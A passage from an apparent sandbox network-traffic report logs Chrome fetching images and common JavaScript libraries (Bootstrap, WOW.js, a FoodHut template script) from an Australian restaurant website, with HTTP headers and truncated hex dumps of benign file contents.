                                                                                                                                                    2024-10-01 04:26:30 UTC119INData Raw: 37 c7 fa ff 00 eb 69 12 c9 46 4f cc 8b a7 e6 4b f2 fc 9f 21 e9 ff 00 ab ee d3 94 6a cf 88 fc 8f ff 00 e8 4f 9b e6 f9 13 f3 3d df fa da 45 38 fb 50 3c 97 4b ee bf 9b 17 e6 fc bf 37 ef 6b 82 85 70 8f fc 43 fc 9f 9d 27 f8 9e bf 29 f9 ff 00 d3 a6 95 35 77 bd fc bb de 9f 97 1f c9 f2 f5 fd ef ee 7f b3 48 57 0e b4 3f ff 00 f7 7f e1 df e9 ff 00 57 4d 4e 5f ff d9
                                                                                                                                                    Data Ascii: 7iFOK!jO=E8P<K7kpC')5wHW?WMN_


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    32192.168.2.449780162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC639OUTGET /assets/imgs/special-menu-3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:24 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 86437
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: ff d8 ff e1 2b 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 35 3a 31 33 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: +"ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:15:13
                                                                                                                                                    2024-10-01 04:26:31 UTC6016INData Raw: 8c 7b 59 7d 36 09 ae da dc 1e c7 0e 3d 8f 66 e6 f6 50 c0 cd c4 cf c7 17 63 58 db 1b 25 a4 b4 82 43 9b f4 98 e8 fa 2e 6a 06 47 47 af d7 7e 5e 0b ce 16 63 cc d9 65 62 6b b4 8f fb 9b 8b ed af 23 f3 7f 4b fa 2c cf 4f f4 74 e5 d2 ae 86 84 b7 da 9b f0 63 cb cd 40 80 2c f5 1a 3d d1 04 f8 8f 05 9e ce af 66 35 8d c7 ea f5 8c 3b 1c 43 2a c9 69 dd 8d 6b 8f d1 0c bd db 7e cf 6b fd bf ab 66 7a 5f a4 fd 16 2d d9 9f ce 2d 02 ed 46 e0 40 f1 1c 7f 6b f3 92 42 de 98 de 5e d8 dc e1 b6 7c bb 0f ea a0 8a bf 4a dd 09 23 57 17 7e 0a c1 2d f0 24 79 04 1c cc cc 4c 0c 4b 73 32 ec 6d 18 d4 34 be db 5f a0 00 7f d2 73 bf 75 9f 9e 85 29 ad d5 ba ae 07 43 e9 b6 67 e7 3c b6 8a 04 00 20 d8 f7 9f a1 55 2c f6 ef ba d7 7d 0f fd 26 bc c0 fd 67 eb 36 f5 86 fd 68 be 96 bd f8 e3 f5 6c 02 e3 b1
                                                                                                                                                    Data Ascii: {Y}6=fPcX%C.jGG~^cebk#K,Otc@,=f5;C*ik~kfz_--F@kB^|J#W~-$yLKs2m4_su)Cg< U,}&g6hl
                                                                                                                                                    2024-10-01 04:26:31 UTC2176INData Raw: 16 d0 1c 75 f1 ff 00 6a e8 71 9e d6 46 c0 03 bb 15 5d d4 6c 60 8d 38 d7 cc 68 9d 92 d0 47 13 1f ea d5 97 29 9b d5 d2 11 14 e8 30 b4 82 5b 04 f2 01 f3 4a 9b b2 b1 b2 5b 95 87 61 a7 25 ba 6f 02 64 1f a5 55 ac ff 00 0b 53 bf 73 ff 00 46 7b d0 71 9d b9 c3 6c 18 ec 4c 7f d2 56 6d 6c 02 09 8f 08 f3 46 04 e9 fb 11 2a fb 7b bd 87 46 eb d8 fd 50 7a 2f db 46 7b 04 be 89 90 e0 3f c2 d0 ef cf af f9 3f ce 55 fe 13 fc 1d 96 4b a8 f4 96 e4 4d b4 fe 8e f1 f7 15 c1 db 53 d8 45 cd 73 99 65 67 73 5e d2 43 9a 47 d1 73 1c df a2 ef ea ae a3 a0 7d 70 66 4b eb e9 fd 59 cd ab 2d e7 65 19 3a 35 96 bb 80 cb 3f 36 9c 87 ff 00 db 37 3f f9 9f f4 0a dc 32 89 7a 67 bf 43 dd ad 3c 46 3e b8 6c 37 09 f1 33 ef c5 b3 d2 bc 10 46 86 54 ba a7 57 c1 c1 6d 77 65 64 3a ac 4b 8f a4 e7 7b de 4b ec
                                                                                                                                                    Data Ascii: ujqF]l`8hG)0[J[a%odUSsF{qlLVmlF*{FPz/F{??UKMSEsegs^CGs}pfKY-e:5?67?2zgC<F>l73FTWmwed:K{K
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 34 62 65 31 31 66 37 2d 30 63 65 30 2d 31 31 65 64 2d 61 35 35 32 2d 62 61 65 61 39 64 33 61 65 34 34 31 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 37 64 65 36 37 34 33 2d 66 61 38 66 2d 63 66 34 65 2d 62 63 33 63 2d 31 39 38 39 61 63 66 62 35 63 31 30 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 42 44 39 32 31 32 35 34 36 46 30 36 34 37 30 39 32 38 39 38 33 41 35 31 45 45 32 38 32 42 34 42 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f
                                                                                                                                                    Data Ascii: obe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:c4be11f7-0ce0-11ed-a552-baea9d3ae441" xmpMM:InstanceID="xmp.iid:67de6743-fa8f-cf4e-bc3c-1989acfb5c10" xmpMM:OriginalDocumentID="BD9212546F06470928983A51EE282B4B" dc:format="image/jpeg" photoshop:Co
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: e1 97 ba c5 36 be 4a 3b 89 61 6a db 84 63 5e d4 56 50 6a a1 32 1a f0 bd 7d 93 d8 a2 93 59 72 6b c1 63 4e 9a df c7 7c 70 f2 41 f8 ec 73 61 40 24 bf 8d 0b 3c da 7a fe 25 8e 1a 93 4a 23 8e 3d ad 94 13 d1 b1 e1 ca d3 c1 2d 74 da ec 21 b9 eb 3e d9 05 f7 4b 95 dd c1 07 e3 8f 9f 60 f5 2d 3e f9 37 be a5 bd f5 e7 a7 72 32 62 b4 ad 1a 01 c3 85 2b e2 6e e4 14 1e 30 46 be 00 52 bd 74 02 34 1c 5a 5f af f8 27 1f 9e 68 4b 25 48 d2 48 52 ac 35 e1 08 28 3d 8b 17 f6 2b 5b 21 81 af 18 22 42 36 53 32 9b 12 d1 d7 4b 2d 9a 5d a8 57 7b 16 ae e9 6d ec a4 34 36 30 65 6a bb 39 63 6a b7 b4 d6 a3 d8 fb 25 72 de ef ec f1 d7 db fb 66 c3 69 58 6d dd 96 ce f7 fd 84 5b 0d a6 ff 00 5c 75 9b bd d5 b5 ab 75 ad 13 24 2d 8c aa 97 9e 2a 14 e4 85 03 d8 b8 1a bc 7b 5a 35 ac a5 ba 31 2c b2 69 25
                                                                                                                                                    Data Ascii: 6J;ajc^VPj2}YrkcN|pAsa@$<z%J#=-t!>K`->7r2b+n0FRt4Z_'hK%HHR5(=+[!"B6S2K-]W{m460ej9cj%rfiXm[\uu$-*{Z51,i%
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: a2 01 16 fc 8c ab 82 b7 d1 ae a4 b2 91 80 19 43 65 5b 8f 2f 9a b2 e9 f4 ac ca 71 ce c3 22 fd 37 a8 dd 82 23 29 b8 21 ae 07 c7 e2 a5 99 39 93 99 80 d8 3c 55 92 4b 1b 8c 0e d0 7c d5 d5 8d 2c 47 d6 28 c0 30 fe b5 09 f4 cd d2 90 ef 1b 0f ae 28 2e aa c4 1c 04 ab b2 fd 8d 5b 6e 0d 5d 36 76 55 f5 71 74 b5 60 59 35 51 70 ca 3e 36 fb 55 fe d2 8c ce bf 9e d0 0f ff 00 66 20 73 28 ff 00 98 87 99 3d 75 e0 a5 68 8d c0 d9 be d4 b9 0f 0f 78 8c 0d ea f7 26 c0 92 d8 d5 98 80 a3 16 26 ac a7 80 1c 06 ea 52 36 76 d1 5d a4 76 76 d6 66 db ba f4 54 82 58 ec 51 8d e9 ef 0b 49 a9 cb ec de 35 bc d9 87 22 47 ff 00 e4 a8 e0 d4 02 ae 38 5d 4e d0 47 0b fd 1a 93 4a e6 ca 58 81 f2 1a bf c1 6a 99 a1 01 4c f0 c5 2c a0 61 c6 41 46 6f 9e a8 b5 f9 46 39 9f 4b d4 80 8d e0 03 9e 3f d9 6a 9d 5c
                                                                                                                                                    Data Ascii: Ce[/q"7#)!9<UK|,G(0(.[n]6vUqt`Y5Qp>6Uf s(=uhx&&R6v]vvfTXQI5"G8]NGJXjL,aAFoF9K?j\
                                                                                                                                                    2024-10-01 04:26:31 UTC12709INData Raw: 4e 63 26 ce d0 2d ba af 22 5b a6 00 04 6e f8 a8 c9 1b 67 16 b2 5f 11 f3 b3 54 71 15 01 e2 b8 ec 2c 49 cd c6 6b ab d3 01 41 b9 00 5e c3 65 fd 5a cb 0b 64 b9 ba 28 16 e2 1c cb f0 9a 2a ea 1d 76 d9 85 c5 c5 07 5c 62 94 d8 5b 68 3d 95 66 70 ef 80 01 70 c7 d3 4a 03 71 91 7b 36 03 f5 f9 aa 45 8a d0 c3 11 ca f2 93 b4 8e ca 45 d2 b3 4a 54 5d b5 0d cd 23 9e 7e 1e 58 d2 1e 4a 31 ca 83 39 36 52 45 d5 45 af 95 e8 48 47 41 6f 9b 06 bf 10 35 d4 28 19 c0 cc 55 cf 67 7b 87 8a 94 75 15 e2 85 83 81 1d f3 c6 4f 0b 09 3c ad 44 86 ea a9 00 2d 80 1b 0f 27 81 a8 ea 50 e5 1b 42 8e 61 d9 41 65 b9 00 62 d6 c3 e7 57 58 2d 91 81 cd 97 0b 93 bf e9 51 58 d7 8b 66 27 0b f9 6b f3 1a 92 4c ac 32 a9 be cb d0 20 de fb 3e 0b 1c 47 66 ea 25 a1 8c 92 2c 4e 45 c4 76 6c ae 51 61 b3 01 5c a3 f5
                                                                                                                                                    Data Ascii: Nc&-"[ng_Tq,IkA^eZd(*v\b[h=fppJq{6EEJT]#~XJ196REEHGAo5(Ug{uO<D-'PBaAebWX-QXf'kL2 >Gf%,NEvlQa\


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    33192.168.2.449783162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC399OUTGET /assets/vendors/bootstrap/bootstrap.affix.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 4838
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC4838INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 3a 20 61 66 66 69 78 2e 6a 73 20 76 33 2e 33 2e 36 0a 20 2a 20 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 6a 61 76 61 73 63 72 69 70 74 2f 23 61 66 66 69 78 0a 20 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74
                                                                                                                                                    Data Ascii: /* ======================================================================== * Bootstrap: affix.js v3.3.6 * http://getbootstrap.com/javascript/#affix * ======================================================================== * Copyright 2011-2015 Twitt


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    34192.168.2.449782162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC381OUTGET /assets/vendors/wow/wow.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 8415
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC8415INData Raw: 2f 2a 21 20 57 4f 57 20 2d 20 76 31 2e 31 2e 33 20 2d 20 32 30 31 36 2d 30 35 2d 30 36 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 4d 61 74 74 68 69 65 75 20 41 75 73 73 61 67 75 65 6c 3b 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 67 3d 5b 5d 2e 69 6e 64 65 78 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 63 3e 62 3b 62 2b 2b 29 69 66 28 62 20 69 6e 20 74 68 69 73 26 26 74 68 69 73 5b 62 5d 3d 3d 3d 61 29 72 65 74 75 72 6e 20
                                                                                                                                                    Data Ascii: /*! WOW - v1.1.3 - 2016-05-06* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    35192.168.2.449784162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC376OUTGET /assets/js/foodhut.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1161
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC1161INData Raw: 2f 2a 21 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 2a 20 46 6f 6f 64 48 75 74 20 4c 61 6e 64 69 6e 67 20 70 61 67 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 0a 2a 20 43 6f 70 79 72 69 67 68 74 3a 20 32 30 31 39 20 44 65 76 43 52 55 44 20 28 68 74 74 70 73 3a 2f 2f 64 65 76 63 72 75 64 2e 63 6f 6d 29 0a 2a 20 4c 69 63 65 6e 73 65 64 3a 20 28 68 74 74 70 73 3a 2f 2f 64 65 76 63 72 75 64 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 73 29 0a 2a 20 43 6f 64 65 64 20 62 79 20 77 77 77 2e 64 65 76 63 72
                                                                                                                                                    Data Ascii: /*!=========================================================* FoodHut Landing page=========================================================* Copyright: 2019 DevCRUD (https://devcrud.com)* Licensed: (https://devcrud.com/licenses)* Coded by www.devcr


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    36192.168.2.449785162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC377OUTGET /assets/imgs/icon3.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 20691
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 64 08 06 00 00 00 0f 33 87 a5 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 39 e1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR^d3pHYsttfx9iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:31 UTC4659INData Raw: 7e 19 11 5d 43 44 db f7 a7 0e 9f 42 cf 27 51 14 bd 4c 44 da 22 f2 c7 00 ac 88 bc b1 7c 0e 11 91 52 ea 8d 5e 88 5e e7 75 ff fa 4a 7c 90 74 6b ed 24 d0 eb 00 de a1 b5 be 96 88 b6 4f a0 73 0f a8 46 44 48 d3 f4 d5 4a a9 b7 58 6b af ea 74 3a 7f e2 9c 5b 24 a2 41 da cf bf cb 85 5e 75 be dd 3b 0a 7a 2d f0 a6 72 88 1f 00 2f 8a 62 00 78 c8 25 6a ad 07 fc bc 52 0a ce b9 26 80 6b a2 28 7a f1 81 2e e5 13 fc fe 16 80 d7 8b c8 b5 cc 7c b2 31 e6 7d 22 f2 ac 72 ce b5 1c 37 12 d1 eb 8b a2 f8 b0 d6 5a a6 cc b9 12 80 94 99 0b 00 96 ba dd ee c4 ce 8d 00 7e 4e 44 3e a8 b5 be fc 60 05 bd fc 7e 00 7e 20 22 cf 60 e6 07 95 52 c6 39 f7 11 ad f5 cb 47 9c 07 00 9d a2 28 ae d0 5a 7f 61 58 1b 04 ca bb d5 6a 8d 74 b9 9d 73 da 0f 18 ab 15 f4 75 2b 11 5d af b5 be fc 60 52 2d 13 74 fe e3
                                                                                                                                                    Data Ascii: ~]CDB'QLD"|R^^uJ|tk$OsFDHJXkt:[$A^u;z-r/bx%jR&k(z.|1}"r7Z~ND>`~~ "`R9G(ZaXjtsu+]`R-t


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    37192.168.2.449786162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC400OUTGET /assets/vendors/bootstrap/bootstrap.bundle.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC280INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 222911
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16104INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61
